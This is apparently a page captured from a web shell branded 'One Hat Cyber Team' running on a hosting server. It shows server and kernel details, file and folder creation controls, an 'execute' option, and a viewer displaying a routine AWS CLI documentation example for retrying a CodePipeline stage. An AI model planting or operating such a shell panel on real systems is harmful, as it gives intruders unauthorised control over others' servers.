⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
codepipeline
/
View File Name :
retry-stage-execution.rst
**To retry a failed action** The following ``retry-stage-execution`` example retries a stage that has a failed action. :: aws codepipeline retry-stage-execution \ --pipeline-name MyPipeline \ --stage-name Deploy \ --pipeline-execution-id b59babff-5f34-EXAMPLE \ --retry-mode FAILED_ACTIONS Output:: { "pipelineExecutionId": "b59babff-5f34-EXAMPLE" } For more information, see `Retry failed actions (CLI)
`__ in the *AWS CodePipeline User Guide*.